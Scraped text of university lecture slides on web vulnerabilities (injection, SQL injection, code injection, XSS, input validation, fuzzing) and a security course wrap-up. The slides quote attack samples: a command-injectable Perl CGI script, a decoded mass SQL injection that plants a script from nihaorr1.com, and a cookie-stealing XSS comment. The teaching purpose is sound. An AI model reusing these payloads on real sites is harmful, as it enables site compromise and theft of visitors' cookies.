CIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup

Size: px

Start display at page:

Download "CIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup"

Gordon Washington
8 years ago
Views:

1 CIS 433/533 - Computer and Network Security Web Vulnerabilities, Wrapup Professor Kevin Butler Winter 2011 Computer and Information Science

2 Injection Attacks flaws relating to invalid input handling which then influences program execution often when passed as a parameter to a helper program or other utility or subsystem most often occurs in scripting languages encourage reuse of other programs / modules often seen in web CGI scripts

program or other utility or subsystem most often occurs in scripting

3 Unsafe Perl Script 1 #!/usr/bin/perl 2 # finger.cgi - finger CGI script using Perl5 CGI module 3 4 use CGI; 5 use CGI::Carp qw(fatalstobrowser); 6 $q = new CGI; # create query object 7 8 # display HTML header 9 print $q->header, 10 $q->start_html('finger User'), 11 $q->h1('finger User'); 12 print "<pre>"; # get name of user and display their finger details 15 $user = $q->param("user"); 16 print `/usr/bin/finger -sh $user`; # display HTML footer 19 print "</pre>"; 20 print $q->end_html;

query object 7 8 # display HTML header 9 print $q->header, 10 $q->start_html('finger User'), 11 $q->h1('finger User'); 12

4 Safer Script counter attack by validating input compare to pattern that rejects invalid input see example additions to script: 14 # get name of user and display their finger details 15 $user = $q->param("user"); 16 die "The specified user contains illegal characters!" 17 unless ($user =~ /^\w+$/); 18 print `/usr/bin/finger -sh $user`;

their finger details 15 $user = $q->param("user"); 16 die "The specified user

5 SQL Injection another widely exploited injection attack when input used in SQL query to database similar to command injection SQL meta-characters are the concern must check and validate input for these $name = $_REQUEST['name']; $query = SELECT * FROM suppliers WHERE name = '". $name. "';" $result = mysql_query($query); $name = $_REQUEST['name']; $query = SELECT * FROM suppliers WHERE name = '". mysql_real_escape_string($name). "';" $result = mysql_query($query);

$query = SELECT * FROM suppliers WHERE name = '". $name.

6 Consequences When SQL injection goes bad... 6

7 Real SQL Injection C C C C F F F F C E006E D C E006E D F006D F A C F 006C D006E E D E E E D E E D F E D F E D F E D F E C F F E F 004D C F F E F C C F D E B B B D B B B D003D D F006E C 005B B B D B C D A002F002F E006E F E F006D002F E006A E003C002F E E F004D C F F E F C E C004F C F F C004C004F C F

00350029002C0040004300200076006100720063006800610072002800320035003500290020 004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F

8 Decoded result: varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor WHILE (@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')fetch NEXT FROM Table_Cursor END CLOSE Table_Cursor DEALLOCATE Table_Cursor Redirects to malicious domain where 8 different browser exploits are launched 8

xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE (@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set

9 Code Injection further variant input includes code that is then executed see PHP remote code injection vulnerability variable + global field variables + remote include this type of attack is widely exploited <?php include $path. 'functions.php'; include $path. 'data/prefs.php'; GET /calendar/embed/day.php?path=

type of attack is widely exploited <?php include $path. 'functions.php'; include $path.

10 Cross Site Scripting Attacks attacks where input from one user is later output to another user XSS commonly seen in scripted web apps with script code included in output to browser any supported script, e.g. Javascript, ActiveX assumed to come from application on site XSS reflection malicious code supplied to site subsequently displayed to other users

11 XSS Example guestbooks, wikis, blogs etc where comment includes script code e.g. to collect cookie details of viewing users need to validate data supplied including handling various possible encodings attacks both input and output handling Thanks for this information, its great! <script>document.location=' document.cookie</script>

12 Validating Input Syntax to ensure input data meets assumptions e.g. is printable, HTML, , userid etc compare to what is known acceptable not to known dangerous as can miss new problems, bypass methods commonly use regular expressions pattern of characters describe allowable input details vary between languages bad input either rejected or altered

is printable, HTML, email, userid etc compare to what is known acceptable not to known

13 Input Fuzzing powerful testing method using a large range of randomly generated inputs to test whether program/function correctly handles abnormal inputs simple, free of assumptions, cheap assists with reliability as well as security can also use templates to generate classes of known problem inputs could then miss bugs, so use random as well

free of assumptions, cheap assists with reliability as well as security can also use

14 Wrapup So, what does it all mean? 14

15 The state of security issues are in public consciousness Press coverage is increasing Losses mounting (billions and billions) Affect increasing (ATMs, commerce) Public is at risk... What are we doing? sound and fury signifying nothing (well, its not quite that bad) 15

Affect increasing (ATMs, commerce) Public is at risk.

16 The problems What is the root cause? Security is not a key goal and it never has been so, we need to figure out how to change the way we do engineering (and science) to make computers secure. Far too much misunderstanding about basic security and the use of technology (security theatre) 16

..... so, we need to figure out how to change the way we do engineering (and

17 The current solutions Make better software we mean it - B. Gates (2002) no really - B. Gates (2003) Linux/OS X/Sun OS etc. is bad too - B. Gates (2005) Vista will fix everything - B. Gates (2006) Vista fixes everything - B. Gates (2007) Sorry about Vista... - B. Gates (2007.5) Windows 7.0 will fix everything - B. Gates (2008) CERT/SANS-based problem/event tracking Experts tracking vulnerabilities Patch system completely broken Destructive research Back-pressure on product developers Arms-race with bad guys Problem: reactive, rather than proactive 17

18 The real solutions Fix the economic incentive equation Eventually, MS/Sun/Apple/*** will be in enough pain that they change the way they make software Education Things will get better when people understand when how to use technology Fix engineering practices Design for security Apply technology What we have been talking about 18

software Education Things will get better when people understand when how to use

19 Your new skills arsenal A little knowledge is a dangerous thing More and more, real lives at stake through subverting computers With great power comes great responsibility 19

20 The bottom line The Web/Internet and new technologies have limited ability to address security and privacy concerns computer science is making the world less safe!! it is incumbent on us as scientists to meet these challenges. Evangelize importance of security Provide sound technologies Define better practices 20

less safe!! it is incumbent on us as scientists to meet these challenges.

21 Computer and Information Science Thank You!!!

CNT5410 - Computer and Network Security Review/Wrapup

CNT5410 - Computer and Network Security Review/Wrapup Professor Kevin Butler Fall 2015 Review What did we talk about this semester? Cryptography secret vs public-key key exchange (Diffie-Hellman) symmetric